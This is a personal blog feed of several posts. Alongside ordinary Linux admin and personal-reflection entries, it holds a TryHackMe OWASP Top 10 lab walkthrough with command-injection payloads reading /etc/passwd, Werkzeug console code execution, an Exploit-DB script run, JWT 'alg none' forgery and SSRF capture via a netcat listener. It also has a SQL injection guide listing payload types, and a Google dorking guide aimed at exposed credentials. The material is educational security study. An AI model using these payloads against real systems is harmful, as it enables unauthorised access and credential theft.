Simply Add New User to Kali Linux and Grant Sudo Privileges

Thu, 17 Apr 2025 08:38:02 GMT

I want to share some basic Linux commands to add a new user via the command line. But first, we need to log in to the default user, and then you can follow these steps.

1. Open the Terminal

You can press Ctrl + Alt + T to launch the terminal.

2. Create a New User

sudo useradd -m username

Replace the username you need to change. The -m option ensures the creation of a home directory for the user.

For example, the username I set is ‘farrosfr.’

3. Set a Password for the New User

sudo passwd username

Replace the username with the one that has already been created.

Type the new password for the new user and retype it until you see the message: ‘Password updated successfully’.

4. Grant Sudo Privileges

To allow the new user to execute administrative tasks, add them to the sudo group:

sudo usermod -aG sudo username

Don’t forget to replace the username. The -aG options append the user to the specified group without removing them from other groups.

5. Set the Default Shell to Bash

sudo chsh -s /bin/bash username

Replace the username. This command changes the user’s login shell to /bin/bash.

6. Verify the New User

id username

Explanation:

uid=1001(farrosfr): The user ID (UID) for farrosfr is 1001.
gid=1001(farrosfr): The group ID (GID) for farrosfr is 1001, and it's associated with the group farrosfr.
groups=1001(farrosfr),27(sudo): The user farrosfr belongs to two groups:
1. farrosfr (group ID 1001)
2. sudo (group ID 27), which allows the user to perform administrative tasks using sudo.

7. Switch to the New User

su - username

You can also try logging in on the login panel to verify the new username.

I think that’s all. Thanks for reading. I hope this can be useful.

My Journey in Renewable Energy as an IT Engineer

Thu, 10 Apr 2025 07:28:08 GMT

In this article, I want to write a story about my experience working in a renewable energy company as an IT engineer in my country, Indonesia. Especially, I work in Yogyakarta, a city that attracts many tourists from various countries because it is near the Borobudur Temple, a UNESCO World Heritage Site.

I work at PT Tripower Solar Nusantara, with the website https://solar-nusantara.id, which has an e-commerce platform called SonusHUB, available at https://sonushub.id. My main task is to handle both websites, as Solar Nusantara focuses on projects, while SonusHUB is for the sale of electrical materials, particularly in renewable energy, with a few items related to smart manufacturing materials. SonusHUB is a B2B and B2G platform, so the target clients are electricity shops, industries, government, and institutions.

Some things I want to share are the values I’ve gained from working at this company. Although it’s a small company, it is growing rapidly. Almost every day, we have meetings filled with a spirit to improve, even though we face many obstacles. We understand that surviving in the renewable energy field is not easy, especially when the government doesn’t provide enough subsidies and we must compete with conventional energy sources like coal and oil, which are still abundant and widely used.

It has forced me to grow as well, because renewable energy is something I believe in and consider a blessing. We utilize green energy, which is unlimited, like solar panels. We know that solar panels are still a great option, but there are some issues, such as inverter problems, hot spots, PID, weather damage, and dirt accumulation. These issues highlight the need for regular maintenance to ensure optimal performance.

I think that’s enough for this story; maybe I will continue it later. Thank you for reading, and I’m very open to discussion about renewable energy. For more details or to contact me, you can reach me via my company email: farros.alfatih@solar-nusantara.id.

OWASP Top 10–2021 | TryHackMe Write-up

Sun, 30 Mar 2025 16:32:56 GMT

Here is my article on the walkthrough of free room for TryHackMe: OWASP TOP 10 - 2021, which is the final section of the Web Hacking module.I wrote this in 2025 and hope it is useful for learning about OWASP TOP 10

Task 1: Introduction

Here is the list of the Top 10 OWASP 2021 vulnerabilities that will be discussed in this write-up. The source can also be checked at the OWASP Top Ten Project page:

Broken Access Control
Cryptographic Failures
Injection
Insecure Design
Security Misconfiguration
Vulnerable and Outdated Components
Identification and Authentication Failures
Software and Data Integrity Failures
Security Logging & Monitoring Failures
Server-Side Request Forgery (SSRF)

Read the above.

No answer needed

Task 2: Accessing Machines

To access these machines, you need to either:

Connect using OpenVPN
Use an in-browser Linux Machine

Connect to our network or deploy the AttackBox.

No answer needed

Task 3: 1. Broken Access Control

Read and understand what broken access control is.

No answer needed

Task 4: Broken Access Control (IDOR Challenge)

Read and understand how IDOR works.

No answer needed

Deploy the machine and go to http://MACHINEIP — Login with the username noot and the password test1234.

THM Note Server

No answer needed

Q1: Look at other users’ notes. What is the flag?

Change the noteid from 1 to 0.

THM Flag

flag{fivefourthree}

Task 5: 2. Cryptographic Failures

Read the introduction to Cryptographic Failures and deploy the machine.

No answer needed

Task 6: Cryptographic Failures (Supporting Material 1)

Read and understand the supporting material on SQLite Databases.

No answer needed

Task 7: Cryptographic Failures (Supporting Material 2)

Read the supporting material about cracking hashes.

No answer needed

Task 8: Cryptographic Failures (Challenge)

It’s now time to put what you’ve learnt into practice! For this challenge, connect to the web application at http://machine-ip:81/.

Have a look around the web app. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

Q1: What is the name of the mentioned directory?

Web App

Go to the login page.

We can view the source code on the web by jumping into the developer tools (Ctrl+Shift+I in Mozilla) to inspect the code.

We found this note from the developer with green-colored text.

/assets

Q2: Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

We are going to the path https://MACHINEIP:81/assets.

webapp.db

Q3: Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Download the database from the website, then type ls -l in the Downloads directory.

Opens the SQLite command-line interface and connects to the webapp.db database with sqlite3 webapp.db. Lists all the tables in the database with .tables to view the sessions and users tables. Then, run PRAGMA table_info(users); to view the columns. After that, execute the script SELECT username, password FROM users; to retrieve specific details about the admin's password.

6eea9b7ef19179a06954edd0f6c05ceb

Crack the hash.
Q4: What is the admin’s plaintext password?

Open the website crackstation.net, then enter the hash and click the ‘Crack Hashes’ button to decrypt the password.

crackstation.net

qwertyuiop

Q5: Log in as the admin. What is the flag?

Flag

THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task 9: 3. Injection

I’ve understood Injection attacks.

No answer needed

Task 10: 3.1. Command Injection

To complete the questions below, navigate to http://MACHINEIP:82/ and exploit the cowsay server.

Q1: What strange text file is in the website’s root directory?

http://MACHINEIP:82

Try to run the script $(ls) that can generate the URL path [http://MACHINE_IP:82/?cow=default&mooing=%24%28ls%29](http://MACHINE_IP:82/?cow=default&mooing=%24%28ls%29)

drpepper.txt

Q2: How many non-root/non-service/non-daemon users are there?

You can run this script to check $(cat /etc/passwd) or this script for more details to check if any non-root, non-service, or non-daemon users are present: $(cat /etc/passwd | awk -F: '{if ($3 >= 1000 && $3 < 65534) print $1}' | wc -l)

0

Q3: What user is this app running as?

Start with the command recommended by TryHackMe: $(whoami)

$(whoami)

apache

Q4: What is the user’s shell set as?

Run this script: $(awk -F: '$3 >= 1000' /etc/passwd). This script uses awk to filter and display user entries from the /etc/passwd file where the user's UID (User ID) is greater than or equal to 1000. UIDs starting from 1000 are typically assigned to non-system (regular) users.

/sbin/nologin

Q5: What version of Alpine Linux is running?

You can run this script to check the version of Linux: $(cat /etc/os-release)

3.16.0

Task 11: 4. Insecure Design

Try to reset joseph’s password. Keep in mind the method used by the site to validate if you are indeed joseph.

No answer needed

Q1: What is the value of the flag in joseph’s account?

Try resetting the password.

reset password

There are so many possible answers to the security question here.

secure question

Found the correct answer to the color question, which is ‘green.’

secure question pass

We can try logging in after that and search for the flag

THM{Not3venc4tzc0uldsav3U!}

Task 12: 5. Security Misconfiguration

Navigate to http://MACHINEIP:86/console to access the Werkzeug console.

Werkzeug Console

No answer needed

Use the Werkzeug console to run the following Python code to execute the ls -l command on the server:

import os; print(os.popen("ls -l").read())

Q1: What is the database file name (the one with the .db extension) in the current directory?

ls -l

todo.db

Q2: Modify the code to read the contents of the **app.py** file, which contains the application's source code. What is the value of the **secret_flag** variable in the source code?

cat app.py

THM{Justatinymisconfiguration}

Task 13: 6. Vulnerable and Outdated Components

Read about the vulnerability.

No answer needed

Task 14: Vulnerable and Outdated Components — Exploit

Read the above!

No answer needed

Task 15: Vulnerable and Outdated Components — Lab

Navigate to http://10.10.6.94:84 where you’ll find a vulnerable application. All the information you need to exploit it can be found online.

Q1: What is the content of the /opt/flag.txt file?

First, open https://www.exploit-db.com/ to check for vulnerabilities using the keyword ‘book store’ and verify the results.

We found this, and then we can download the exploit file to our directory.

Try running the script file 47887.py with the command python3 47887.py http://MACHINE_IP:84, and then use the script as instructed by running cat /opt/flag.txt.

THM{But1tsn0tmyf4ult!}

Task 16: 7. Identification and Authentication Failures

I’ve understood broken authentication mechanisms.

No answer needed

Task 17: Identification and Authentication Failures Practical

Q1: What is the flag that you found in darren’s account?

Try to register with Darren as your username based on the instructions, and then the error message will be displayed.

Let’s try with the user ‘ darren’ (with a space in front of the text).

Try to log in as ‘ darren’.

fe86079416a21a3c99937fea8874b667

Now try to do the same trick and see if you can log in as arthur.

No answer needed

Q2: What is the flag that you found in arthur’s account?

Try the same method to log in as the ‘darren’ user.

d9ac0f7db4fda460ac3edeb75d75e16e

Task 18: 8. Software and Data Integrity Failures

Read the above and continue!

No answer needed

Task 19: Software Integrity Failures

Q1: What is the SHA-256 hash of [**https://code.jquery.com/jquery-1.12.4.min.js**](https://code.jquery.com/jquery-1.12.4.min.js?)?

Open the website srihash.org and then encrypt the given URL with SHA-256.

Task 20: Data Integrity Failures

Q1: Try logging into the application as guest. What is guest’s account password?

MACHINEIP:8089

Try to log in with the username: guest

guest

If your login was successful, you should now have a JWT stored as a cookie in your browser. Press F12 to bring out the Developer Tools.

Depending on your browser, you will be able to edit cookies from the following tabs:

Q2: What is the name of the website’s cookie containing a JWT token?

jwt-session

Q3: What is the flag presented to the admin user?

We can take the value of ‘jwt-session’: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzQzMjM0NTEzfQ.6pfklEryGyL0S45o8OXn7_8dgC5BZvZLhyY_w_-De0k. Then, we can extract it into two sections: Header and Payload.

Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
Payload: eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzQzMjM0NTEzfQ.

We can extract them using online base64 encoder/decoder tools, such as this one: https://appdevtools.com/base64-encoder-decoder, and then transform them into strings:

Header: {"typ":"JWT","alg":"HS256"}
Payload: {"username":"guest","exp":1743234513}

Next, change “HS256” to “none” and “guest” to “admin”, and then convert them back into base64:

Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=
Payload: eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzQzMjM0NTEzfQ==

Finally, concatenate them using a period (.) delimiter to form the following version, which can be copied and pasted into the web developer:

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzQzMjM0NTEzfQ==

THM{Donttakecookiesfromstrangers}

Task 21: 9. Security Logging and Monitoring Failures

Q1: What IP address is the attacker using?

We can see here the login file and know what ip that have unauthorized authentification.

49.99.13.16

Q2: What kind of attack is being carried out?

The attacker attempts to log in by trying different usernames and passwords repeatedly to guess the correct one. We can see multiple unsuccessful login attempts (HTTP 401 Unauthorized) from the same IP address (49.99.13.16) with different usernames (admin, administrator, anonymous, root).

Brute Force

Task 22: 10. Server-Side Request Forgery (SSRF)

Q1: Explore the website. What is the only host allowed to access the admin area?

Let’s try opening the Admin Area from the menu panel.

localhost

Q2: Check the “Download Resume” button. Where does the server parameter point to?

Let’s try inspecting the element for the button, and we’ll get the information that it has a parameter pointing to.

secure-file-storage.com

Q3: Using SSRF, make the application send the request to your AttackBox instead of the secure file storage. Are there any API keys in the intercepted request?

We can extract the link from the web developer like this: http://10.10.2.174:8087/download?server=secure-file-storage.com:8087&id=75482342. Then, we can modify the URL by replacing the server with the IP of the attack box and port 8087.

Before running the modified URL, we need to first execute this script in the terminal to set up the netcat listener:

nc -lvnp 8087

After that, run the modified URL in the browser with the attack box IP:

[http://10.10.2.174:8087/download?server=10.10.32.61:8087&id=75482342](http://10.10.2.174:8087/download?server=10.10.32.61:8087&id=75482342.).

Then, check the terminal for the listener and capture the flag.

Flag

THM{HelloImjustanAPIkey}

Q4: Going the Extra Mile: There’s a way to use SSRF to gain access to the site’s admin area. Can you find it?

Note: You won’t need this flag to progress in the room. You are expected to do some research in order to achieve your goal.

No answer needed

Task 23: What Next?

Why not enroll in our beginner-level pathway or find another room to complete?

No answer needed

Easily Reveal Your Wi-Fi Password in Windows with CMD

Fri, 28 Mar 2025 03:23:03 GMT

If you’ve forgotten the Wi-Fi password that was previously used on your Windows device, you can easily recover it using Command Prompt. Here’s how you can do it:

1. Open Command Prompt

Press the Windows key, type “Command Prompt” or “CMD” in the search bar.
Right-click on “Command Prompt” and select “Run as Administrator” to open it with administrator rights.

2. Display Saved Wi-Fi Network Profiles

In the Command Prompt window, type the following command and press Enter:

netsh wlan show profiles

This command will list all the Wi-Fi networks that your computer has previously connected to.

netsh wlan show profiles

3. View the Password for a Specific Network

To view the password for a specific network, type the following command, replacing Wi-FiName with the actual name of your network, and press Enter:

netsh wlan show profile name="Wi-FiName" key=clear

Example: If your network name is “Home123,” the command would be:

netsh wlan show profile name="Home123" key=clear

The information for that network will be displayed. Scroll down to the “Security settings” section and look for “Key Content.” The Wi-Fi password will be shown here.

From the picture above, we can see that the Wi-Fi network ‘Anti Riba’ has the password ‘antiriba’.

Important Notes

Make sure you have administrator privileges when running these commands.
This method only works for Wi-Fi networks you’ve previously connected to and stored on your computer.

By following these steps, you can easily find your forgotten Wi-Fi password without needing to reset your router or search for old notes.

Thank you for reading, hope it was useful.

Web Application Basics | TryHackMe Write-Up

Sat, 22 Mar 2025 00:39:10 GMT

Here is my writing about one of the rooms on TryHackMe, specifically Web Application Basics, which is part of the Web Hacking module. I will also explain how to complete the CTF in task number 10.

Task 1: Introduction

no answer needed

Task 2: Web Application Overview

Q1: Which component on a computer is responsible for hosting and delivering content for web applications?

web server

Q2: Which tool is used to access and interact with web applications?

web browser

Q3: Which component acts as a protective layer, filtering incoming traffic to block malicious attacks, and ensuring the security of the the web application?

web application firewall

Task 3: Uniform Resource Locator

Q1: Which protocol provides encrypted communication to ensure secure data transmission between a web browser and a web server?

HTTPS

Q2: What term describes the practice of registering domain names that are misspelt variations of popular websites to exploit user errors and potentially engage in fraudulent activities?

Typosquatting

Q3: What part of a URL is used to pass additional information, such as search terms or form inputs, to the web server?

Query String

Task 4: HTTP Messages

Q1: Which HTTP message is returned by the web server after processing a client’s request?

HTTP response

Q2: What follows the headers in an HTTP message?

Empty Line

Task 5: HTTP Request: Request Line and Methods

Q1: Which HTTP protocol version became widely adopted and remains the most commonly used version for web communication, known for introducing features like persistent connections and chunked transfer encoding?

HTTP/1.1

Q2: Which HTTP request method describes the communication options for the target resource, allowing clients to determine which HTTP methods are supported by the web server?

OPTIONS

Q3: In an HTTP request, which component specifies the specific resource or endpoint on the web server that the client is requesting, typically appearing after the domain name in the URL?

URL Path

Task 6: HTTP Request: Headers and Body

Q1: Which HTTP request header specifies the domain name of the web server to which the request is being sent?

Host

Q2: What is the default content type for form submissions in an HTTP request where the data is encoded as key=value pairs in a query string format?

application/x-www-form-urlencoded

Q3: Which part of an HTTP request contains additional information like host, user agent, and content type, guiding how the web server should process the request?

Request Headers

Task 7: HTTP Response: Status Line and Status Codes

Q1: What part of an HTTP response provides the HTTP version, status code, and a brief explanation of the response’s outcome?

Status Line

Q2: Which category of HTTP response codes indicates that the web server encountered an internal issue or is unable to fulfil the client’s request?

Server Error Responses

Q3: Which HTTP status code indicates that the requested resource could not be found on the web server?

404

Task 8: HTTP Response: Headers and Body

Q1: Which HTTP response header can reveal information about the web server’s software and version, potentially exposing it to security risks if not removed?

Server

Q2: Which flag should be added to cookies in the Set-Cookie HTTP response header to ensure they are only transmitted over HTTPS, protecting them from being exposed during unencrypted transmissions?

Secure

Q3: Which flag should be added to cookies in the Set-Cookie HTTP response header to prevent them from being accessed via JavaScript, thereby enhancing security against XSS attacks?

HttpOnly

Task 9: Security Headers

Q1: In a Content Security Policy (CSP) configuration, which property can be set to define where scripts can be loaded from?

script-src

Q2: When configuring the Strict-Transport-Security (HSTS) header to ensure that all subdomains of a site also use HTTPS, which directive should be included to apply the security policy to both the main domain and its subdomains?

includeSubDomains

Q3: Which HTTP header directive is used to prevent browsers from interpreting files as a different MIME type than what is specified by the server, thereby mitigating content type sniffing attacks?

nosniff

Task 10: Practical Task: Making HTTP Requests

Q1: Make a GET request to /api/users. What is the flag?

GET request to /api/users

THM Browser

THM{YOUHAVEJUSTFOUNDTHEUSERLIST}

Q2: Make a POST request to /api/user/2 and update the country of Bob from UK to US. What is the flag?

Set the parameter for the country to ‘US’.

Parameters

POST request to /api/user/2

THM{YOUHAVEMODIFIEDTHEUSERDATA}

Make a DELETE request to /api/user/1 to delete the user. What is the flag?

DELETE request to /api/user/1

YOUHAVEJUSTDELETEDAUSER

Task 11: Conclusion

No answer needed

Thank you for reading. I hope it was useful.

A Practical Guide to Understanding and Mitigating SQLi

Thu, 02 Jan 2025 02:48:26 GMT

Introduction

SQL Injection (SQLi) is a critical web security vulnerability that allows attackers to manipulate SQL queries executed by an application. This attack occurs when user inputs are improperly sanitized and directly embedded into SQL statements, enabling attackers to execute arbitrary SQL commands. SQLi can lead to unauthorized access, data theft, or even complete database compromise.

How SQL Injection Works

SQL Injection exploits the way SQL queries are constructed. When user inputs are concatenated directly into a query without proper validation, attackers can inject malicious SQL code. For example:

Vulnerable Code Example (PHP)

$username = $POST['username'];  
$password = $POST['password'];  
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";  
$result = mysqliquery($connection, $query);

If an attacker inputs:

- username: admin

- password: ‘ OR ‘1’=’1

The resulting query becomes:

SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';

Here, ‘1’=’1' always evaluates to true, bypassing authentication.

Types of SQL Injection Attacks

1. Classic SQL Injection

Directly injects malicious SQL commands into user input fields.
Example payload: ‘ OR ‘1’=’1'; —

2. Union-Based SQL Injection

Exploits the UNION operator to extract data from other tables.
Example payload:

' UNION SELECT username, password FROM adminusers;--

3. Boolean-Based Blind SQL Injection

Uses true/false conditions to infer information.
Example payload:

' AND 1=1;-- (true)
' AND 1=2;-- (false)

4. Time-Based Blind SQL Injection

Exploits database functions that cause delays to infer data.
Example payload:

' OR IF(1=1, SLEEP(5), 0);--

5. Error-Based SQL Injection

Leverages database error messages to gather information.
Example payload:

' AND 1=CONVERT(int, (SELECT @@version));--

Real-World Consequences of SQL Injection

Data Theft: Attackers can extract sensitive data like usernames, passwords, or financial records.
Data Manipulation: Altering or deleting records, such as voiding transactions or changing account balances.
Privilege Escalation: Gaining administrative access by injecting commands that modify user privileges.
Denial of Service (DoS): Dropping tables or shutting down the database server.
System Compromise: Executing OS-level commands through advanced techniques.

Preventing SQL Injection

1. Parameterized Queries (Prepared Statements)

Parameterized queries separate data from code, ensuring user inputs are treated as literals rather than executable commands.

Safe Code Example (PHP):

$stmt = $connection->prepare("SELECT * FROM users WHERE username = ? AND password = ?");  
$stmt->bindparam("ss", $username, $password);  
$stmt->execute();

This approach prevents attackers from altering the query structure.

2. Input Validation and Sanitization

Validate user inputs for expected formats (e.g., numeric fields should only accept numbers).
Reject inputs containing special characters like ‘, — , or ;.

3. Escaping Special Characters

Use database-specific escaping functions to neutralize special characters in user inputs.

Example in PHP:

$username = mysqlirealescapestring($connection, $POST['username']);

4. Stored Procedures

Stored procedures execute predefined SQL code on the server side, reducing the risk of injection if properly implemented.

Example (MySQL):

CREATE PROCEDURE GetUser(IN username VARCHAR(50), IN password VARCHAR(50))  
BEGIN  
    SELECT * FROM users WHERE username = username AND password = password;  
END;

5. Least Privilege Principle

Restrict database user permissions to only what is necessary for the application. For example:

The application should not have permissions to drop tables or execute administrative commands.

6. Web Application Firewalls (WAF)

Deploy a WAF to monitor and block malicious requests containing known SQL injection patterns.

7. Continuous Security Testing

Regularly perform penetration testing and use automated tools to identify vulnerabilities in your application.

Advanced Techniques for Mitigation

Query Parameterization in Different Languages

PHP:

$stmt = $dbh->prepare("SELECT * FROM users WHERE id = ?");

Python:

cursor.execute("SELECT * FROM users WHERE id = %s", (userid,))

Java:

PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE id = ?");

Escaping User Inputs for Specific Databases

MySQL: Use mysqlrealescapestring() to escape special characters in input strings.
PostgreSQL: Use pgescapestring() to properly handle input.
SQLite: Use sqliteescapestring() for input sanitization.

Common Mistakes in Mitigation

1. Relying on Client-Side Validation

Attackers can bypass client-side checks using tools like Burp Suite or directly modifying HTTP requests.

2. Using Blacklists for Input Validation

Blacklists are incomplete and can be bypassed with creative payloads.

3. Improperly Written Stored Procedures

Stored procedures must also validate inputs; otherwise, they remain vulnerable.

Safe Example

Here is a safe way to implement and run code using prepared statements with MySQLi, the following example is using a simple PHP web page with a form to simulate a login process. The form will allow you to enter a username and password, and the PHP script will handle the request and check the credentials against a MySQL database:

1. HTML Form and PHP Code (Single File)

Save this code in a file, e.g., login.php:

<?php  
// Handle form submission  
if ($SERVER['REQUESTMETHOD'] === 'POST') {  
    // Database connection  
    $connection = new mysqli('localhost', 'yourdbuser', 'yourdbpassword', 'yourdbname');  
  
    // Check for connection errors  
    if ($connection->connecterror) {  
        die("Connection failed: " . $connection->connecterror);  
    }  
  
    // Get username and password from POST request  
    $username = $POST['username'];  
    $password = $POST['password'];  
  
    // Prepare and execute query  
    $stmt = $connection->prepare("SELECT * FROM users WHERE username = ? AND password = ?");  
    $stmt->bindparam("ss", $username, $password);  
    $stmt->execute();  
    $result = $stmt->getresult();  
  
    // Check login result  
    if ($result->numrows > 0) {  
        $message = "Login successful!";  
    } else {  
        $message = "Invalid username or password.";  
    }  
  
    // Close the statement and connection  
    $stmt->close();  
    $connection->close();  
}  
?><!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Login Simulation</title>  
</head>  
<body>  
    <h1>Login Simulation</h1>    <?php if (!empty($message)): ?>        <p><?php echo htmlspecialchars($message); ?></p>    <?php endif; ?>    <form method="POST" action="">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required>  
        <br><br>  
        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required>  
        <br><br>  
        <button type="submit">Login</button>  
    </form>  
</body>  
</html>

2. Instructions to Simulate the Web Application

1. Create a Database and Table

Run this SQL to create a database and a table for testing

CREATE DATABASE testdb;  
USE testdb;  
  
CREATE TABLE users (  
    id INT AUTOINCREMENT PRIMARY KEY,  
    username VARCHAR(50) NOT NULL,  
    password VARCHAR(255) NOT NULL  
);  
  
INSERT INTO users (username, password) VALUES ('testuser', 'testpassword');

2. Replace Database Credentials

Update the mysqli connection code in the PHP script

$connection = new mysqli('localhost', 'root', 'your password', 'testdb');

3. Run a Local PHP Server

Save the file as login.php and start a PHP server in the directory where it is saved

php -S localhost:8000

4. Access the Application in a Browser

Open a browser and go to http://localhost:8000/login.php.

5. Test the Login

Enter the username testuser and password testpassword to log in successfully.
Try invalid credentials to see the error message.

Conclusion

SQL Injection is a powerful attack vector with potentially devastating consequences if left unaddressed. By adopting best practices such as parameterized queries, input validation, and least privilege principles, developers can effectively mitigate this threat and secure their applications against exploitation.

Migrate Email Using IMAP Async with Only One Active Domain

Wed, 20 Nov 2024 05:04:18 GMT

Here, I would like to share my experience of migrating the company’s email hosting. Previously, we subscribed to email hosting through emailkerja.id service. This service was quite good and affordable because it only limited storage capacity to 69 GB, but it provided unlimited domains and mailboxes. This allowed us to add multiple domains and mailboxes as long as the storage capacity was sufficient.

As time went by, we became more intensive in conducting email marketing to contact many companies, especially those related to EPC (Engineering, Procurement, and Construction). Therefore, we needed a more robust email server with greater capacity. This prompted us to migrate our email hosting. Of course, the main challenge we faced was how to move old emails.

After considering several options, we ultimately decided to migrate to Hostinger’s Business Starter Email service (with 10 GB of storage per account). Although we initially wanted to use Microsoft 365 or Google Workspace email hosting, we chose Hostinger for cost efficiency. If we needed more storage, we could export the data to a local file.

The migration process involves connecting the domain through DNS by using MX Record, SPF Record, DKIM Record, and DMARC Record. These can be activated as usual, but with the note that the MX Record must prioritize the new email hosting, or ideally, only the MX Record at the new hosting should be active, as email reception has shifted to the new hosting. Once the DNS is connected, we can begin the synchronization (sync) process to copy old emails from the old hosting to the new hosting.

Here is the status showing that the connection has successfully been established with Hostinger,

while still being connected to the previous hosting (emailkerja.id).

Once connected and with the note that the MX Record must be prioritized at the new hosting, we can access the IMAP Async process online to synchronize the emails. This process is much easier to coordinate with the company team compared to instructing colleagues to manually back up and restore emails using Outlook Classic/365. This is because not everyone has that version, considering that Outlook is usually part of an Office bundle with a license, while the New Outlook does not support this feature.

We can use the following link https://imapsync.lamiral.info/X/ to perform IMAP synchronization online (for accounts under 3 GB).

Here, we can enter the email address, password, and IMAP server details for both the source and destination mailboxes. Then, we can click “Sync” to start the synchronization process. There is a detailed log that can be scrolled down, and a percentage status is updated every 6 seconds to track progress.

Once completed, the old emails will be copied to the new email hosting. This is easy to communicate to colleagues because they can do it independently and securely without needing IT involvement, as they can input their own password.

However, if the account’s storage exceeds 3 GB, we need to access the email import feature provided by the email hosting service. Hostinger offers this feature for accounts with storage exceeding 3 GB, enabling email migration.

Once completed, we can see that all the emails have been copied to the new hosting, and we can now use the new email hosting for sending and receiving emails.

Thank you. I hope this information is useful.

Financial Mathematics: Interest and Usury

Fri, 25 Oct 2024 02:49:59 GMT

My experience as a student in the Bachelor of Statistics department who took a financial mathematics class has opened up my awareness and insight into how the modern financial system works.

Simple Interest vs Compound Interest

Interest is divided into 2 types, which is single interest and compound interest where single interest is only calculated from the initial principal on a fixed basis, while compound interest is calculated from the initial principal and previous interest so that the accumulated interest grows exponentially.

Banks and financial institutions almost all apply compound interest to loans and installments. This is a problem because of the convenience if we take installments with a long tenor because in the long term it will provide great benefits to financial institutions, but it is actually burdensome for customers.

Student Dilemma

Many of my friends aspire to work in banks because of the high salaries, prestigious positions, career prospects, and various facilities, such as interest relief given as an employee there. However, after studying the financial mathematics class, this is actually questioned about how the ethical and moral principles are implemented in the job?. Because in terms of usury calculations, it can harm the lower and middle classes.

This article is written as a reflection and consideration for students who wish to continue from the education phase to the career level phase.

Comprehensive Guide to Google Dork Operators and Their Usage

Thu, 17 Oct 2024 10:19:25 GMT

Introduction

Google Dorking is a powerful technique that allows users to perform better and more sophisticated searches by utilizing certain operators within Google Search. Originally intended for research and SEO, Google Dorks have evolved to play a role in cybersecurity by exposing data that has been inadvertently left accessible online. This includes sensitive directories, login portals, and files containing personal or confidential information. Here are some of the main types of data that Google Dorking can reveal:

Types of Information Discoverable Using Google Dorks

Advisories and Vulnerabilities: Helps locate security advisories, exposed vulnerabilities, or misconfigurations in websites or systems.
Error Messages: Detects pages where error messages reveal sensitive backend processes or server structures.
Files Containing Juicy Info: Refers to exposed files that may contain potentially exploitable information such as internal documentation.
Files Containing Passwords: Uncovers files that have accidentally exposed credentials such as .txt or configuration files.
Files Containing Usernames: Locates files with listed usernames that may assist in gaining access to restricted areas.
Footholds: Identifies weak entry points or poorly secured areas on a site, which attackers could exploit for further access.
Network or Vulnerability Data: Searches for network scans or configuration files that expose vulnerabilities.
Pages Containing Login Portals: Finds administrative or user login portals by using specific keywords or URL structures.
Sensitive Directories: Detects directories left open or unprotected, which may contain restricted files.
Sensitive Online Shopping Info: Identifies improperly secured e-commerce platforms exposing customer or payment data.
Various Online Devices: Searches for exposed IoT (Internet of Things) devices, such as web cameras or printers.
Vulnerable Files: Finds outdated or insecure files that could be exploited by attackers.
Vulnerable Servers: Detects servers running old software versions or configurations with known vulnerabilities.
Web Server Detection: Identifies specific types of web servers, helping with penetration testing and security research.

These are just a few of the many ways Google Dorks can be utilized. While these techniques are highly beneficial for cybersecurity audits, SEO professionals, and many others.

1. URL-Based Operators: intitle, allintitle, inurl, and allinurl

These operators are used to locate specific information within URLs or page titles. They play an essential role in filtering results effectively.

`intitle:` – Search URL or Web Page Titles

This operator is ideal when you want to search for web pages with a specific keyword in their title. It works across web, images, groups, and news.

Example:
intitle:"SEO techniques"
This will show pages that have the phrase "SEO techniques" in their title.

`allintitle:` – Search for Titles Containing Multiple Keywords

This is similar to intitle:, but it searches for multiple keywords in the title.

Example:
allintitle: SEO strategy optimization
Results will contain all the listed words in the page title.

`inurl:` – Search Within a URL

This operator helps you find web pages with a specific keyword within the URL. It can be handy for identifying structured URLs or discovering pages with sensitive information.

Example:
inurl:login
This query reveals login pages across various websites.

`allinurl:` – Search for URLs With Multiple Keywords

Similar to inurl:, this operator searches for pages with all the listed terms in the URL.

Example:
allinurl:admin dashboard
You can use this to find admin dashboards that contain both "admin" and "dashboard" in the URL.

link: — Search for Pages Linking to a Specific URL

The link: operator shows pages that link to a specific webpage or domain. This can be used to analyze backlinks, making it helpful for SEO professionals.

Example:
link:example.com
This query will return pages that contain links pointing to example.com.
Usage: Useful for backlink analysis or identifying referring domains.

2. File Type Operators: filetype and Specific File Formats

The filetype: operator is extremely valuable for retrieving specific types of documents, such as PDFs or Excel files, from the web. Below are the commonly used file types.

`filetype:` – Search for Specific File Formats

This operator allows you to retrieve documents of a particular type.

Example:
filetype:pdf SEO checklist
The query will display PDFs related to "SEO checklist".

Common File Types and Their Uses

PDF — Portable Document Format for brochures or guides
DOC/DOCX — Microsoft Word files for articles or reports
XLS/XLSX — Excel sheets for data and analytics
TXT — Plain text files often used for logs or notes
PPT/PPTX — PowerPoint presentations

These file types can be located within web, image, and group results. However, not all are available in news searches.

Site-Specific Search: `site:` Operator

The site: operator is indispensable for narrowing down search results to a specific website or domain. This is particularly useful for SEO professionals when conducting content audits or competitor analysis.

Example:
site:example.com "SEO"
This search shows all pages on example.com that mention the term "SEO".

3. Text-Based Search Operators: `allintext:` and `inanchor:`

`allintext:` – Search for Specific Text on a Page

The allintext: operator ensures that your search focuses on the body text of web pages.

Example:
allintext:"keyword research tools"
This will return pages with "keyword research tools" in the text body.

`inanchor:` – Search for Anchor Text

Anchor text search is valuable in backlink analysis. It finds pages that link to other websites with specific anchor texts.

Example:
inanchor:"best SEO tools"
This query returns pages linking to sites with "best SEO tools" as the anchor text.

4. Search by Numbers and Date: `numrange:` and `daterange:`

`numrange:` – Locate Numerical Ranges

